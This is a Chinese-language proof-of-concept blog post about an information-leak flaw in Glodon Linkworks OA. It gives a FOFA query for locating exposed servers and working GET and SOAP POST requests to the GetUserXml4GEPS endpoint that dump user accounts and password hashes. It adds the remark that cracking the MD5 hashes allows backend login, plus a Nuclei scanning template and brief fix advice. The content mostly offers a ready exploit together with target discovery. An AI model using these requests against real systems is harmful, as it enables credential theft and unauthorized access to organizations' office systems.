Pages

Menu

Babing
Published on 2024-08-30 / 0 Visits
0
0

G4-2广联达-OA-InformationLeakage

#Pocs

G4-2广联达-OA-InformationLeakage

漏洞描述:

广联达Linkworks办公OA存在信息泄露,攻击者可通过此漏洞获取账号密码登录后台,造成其他影响。

网站图片:

image.png
image.png

网络测绘:

fofa语法:

body=“Services/Identification/login.ashx” || header=“Services/Identification/login.ashx” || banner=“Services/Identification/login.ashx”

漏洞复现:

隐患url

/Org/service/Service.asmx

查看所有用户
payload:

GET /Org/service/Service.asmx/GetUserXml4GEPS HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Pragma: no-cache
Proxy-Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
x-forwarded-for: 127.0.0.1

效果图:
image.png

查询账户密码

POST /Org/service/Service.asmx HTTP/1.1
Host: xx.xx.xx.xx
Content-Type: application/soap+xml; charset=utf-8
Content-Length: length

<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
  <soap12:Body>
    <GetUserXml4GEPS xmlns="http://tempuri.org/" />
  </soap12:Body>
</soap12:Envelope>

image.webp
MD5解密即可登陆系统

Yaml模板

id: G4-2GuangLianDa-InformationLeakage
info:
  name: G4-2GuangLianDa-InformationLeakage
  author: BeR09
  severity: high
  description: 
  reference:
    - https://blog.csdn.net/weixin_46944519/article/details/132976132
  tags: GuangLianDa,InformationLeakage

http:
  - method: GET
    path:
      - "{{BaseURL}}/Org/service/Service.asmx/GetUserXml4GEPS"
    headers:
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
      Accept-Encoding: gzip, deflate
      Accept-Language: zh-CN,zh;q=0.9
      Cache-Control: no-cache
      Pragma: no-cache
      Proxy-Connection: keep-alive
      Upgrade-Insecure-Requests: 1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
      x-forwarded-for: 127.0.0.1
    matchers:
      - type: word
        words:
          - "<string xmlns=\"http://tempuri.org/\">&lt;ReturnData&gt;&lt;XML&gt;&lt;NewDataSet&gt;&lt;Table&gt;&lt;USR_ID&gt;0&lt;/USR_ID&gt;&lt;USR_CODE&gt;admin&lt;/USR_CODE&gt;&lt;USR_NAME&gt;"
        part: body

修复建议:

1、禁用泄露敏感信息的页面或应用。
2、升级到安全版本

参考链接:

https://blog.csdn.net/weixin_46944519/article/details/132976132

G4-3广联达-OA-文件上传
G4-1广联达-OA-Inform...

Comment